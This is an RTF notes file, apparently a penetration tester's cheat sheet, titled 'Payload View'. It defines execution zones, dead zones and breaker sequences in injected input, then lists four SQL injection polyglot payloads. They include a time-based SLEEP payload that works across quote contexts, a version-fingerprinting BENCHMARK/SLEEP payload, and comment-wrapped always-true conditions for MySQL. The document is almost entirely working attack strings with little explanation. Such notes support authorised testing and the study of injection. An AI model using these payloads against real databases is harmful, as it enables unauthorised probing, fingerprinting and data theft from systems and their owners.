{\rtf1\ansi\ansicpg1252\cocoartf1404\cocoasubrtf470
{\fonttbl\f0\fswiss\fcharset0 Helvetica;\f1\fnil\fcharset0 Consolas;}
{\colortbl;\red255\green255\blue255;}
\paperw11900\paperh16840\margl1440\margr1440\vieww23520\viewh12500\viewkind0
\deftab720
\pard\pardeftab720\partightenfactor0

\f0\b\fs32 \cf0 \ul \ulc0 Payload View\
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardeftab720\pardirnatural\partightenfactor0
\cf0 \

\b0 \ulnone Execution Zone  	\'97 Part of the payload that is supposed to be executed (MySQL Query) \'97 e.x. alert(\'911\'92)\
Dead Zone			\'97 Part of the payload that is not supposed to be executed (Inside strings, comments, unreachable IF clauses)\
Breaker Sequence 	\'97 Part of the payload that ends one of the zones and start one of the others ( \'91 breaking out of string, */ breaking out of comment and into query)\

\b \ul \
1.\
\
\pard\pardeftab720\partightenfactor0

\f1\b0 \cf0 \expnd0\expndtw0\kerning0
\ulnone SLEEP(1) /*\'91 or SLEEP(1) or \'91\'93 or SLEEP(1) or \'93*/			Works in single, double quote context and in straight into query context
\f0 \kerning1\expnd0\expndtw0 \
\
\pard\pardeftab720\partightenfactor0

\b \cf0 \ul 2.
\b0 \ulnone \
\

\itap1\trowd \taflags1 \trgaph108\trleft-108 \trbrdrt\brdrnil \trbrdrl\brdrnil \trbrdrt\brdrnil \trbrdrr\brdrnil 
\clvertalt \clshdrawnil \clwWidth38160\clftsWidth3 \clbrdrt\brdrnil \clbrdrl\brdrnil \clbrdrb\brdrnil \clbrdrr\brdrnil \clpadl200 \clpadr200 \gaph\cellx8640
\pard\intbl\itap1\pardeftab720\partightenfactor0

\f1 \cf0 \expnd0\expndtw0\kerning0
SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),\uc0\u8203 SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample\cell \lastrow\row
\pard\pardeftab720\partightenfactor0

\f0 \cf0 \kerning1\expnd0\expndtw0 \
\pard\pardeftab720\partightenfactor0

\b \cf0 \ul 3.
\b0 \ulnone \
\
1/*\'92 or 1 or \'91\'92\'92 or 1 or \'91\'92*//*\
\

\b \ul 4. MySQL
\b0 \ulnone \
\
/*\'92 or \'91\'92=\'91\'92\'92 or \'91\'92\'92\'92=\'91\'92*/}